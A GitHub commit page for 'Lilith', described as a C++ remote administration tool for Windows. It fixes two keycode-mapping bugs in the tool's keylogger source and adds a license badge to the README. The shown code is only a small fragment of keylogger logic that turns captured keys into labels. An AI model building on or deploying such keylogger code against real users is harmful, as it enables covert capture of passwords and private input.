Skip to content

Commit

Permalink
Merge branch 'master' of https://github.com/werkamsus/lilith
Browse files Browse the repository at this point in the history
  • Loading branch information
werkamsus committed Jul 13, 2018
2 parents 50d12be + a16d4ba commit db9b85f
Show file tree
Hide file tree
Showing 2 changed files with 3 additions and 3 deletions.
4 changes: 2 additions & 2 deletions Lilith/keylogger.cpp
Original file line number Diff line number Diff line change
Expand Up @@ -108,7 +108,7 @@ void Keylogger::logger() //keycode map taken from https://github.com/TheFox/key
out = "[NUM +]";
else if (c == 109)
out = "[NUM -]";
else if (c == 109)
else if (c == 110)
out = "[NUM ,]";
else if (c >= 112 && c <= 123)
out = "[F" + std::to_string(c - 111) + "]";
Expand All @@ -120,7 +120,7 @@ void Keylogger::logger() //keycode map taken from https://github.com/TheFox/key
out = "[AE]";
else if (c == 186)
out = "[UE]";
else if (c == 186)
else if (c == 187)
out = "+";
else if (c == 188)
out = ",";
Expand Down
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
# Lilith
[![Build status](https://ci.appveyor.com/api/projects/status/0au5goobwkwhvmgu?svg=true)](https://ci.appveyor.com/project/werkamsus/lilith)
[![Build status](https://ci.appveyor.com/api/projects/status/0au5goobwkwhvmgu?svg=true)](https://ci.appveyor.com/project/werkamsus/lilith) [![license](https://img.shields.io/github/license/mashape/apistatus.svg)](https://github.com/werkamsus/Lilith/blob/master/LICENSE)

**Free & Native Open Source C++ Remote Administration Tool for Windows**

Expand Down

0 comments on commit db9b85f

Please sign in to comment.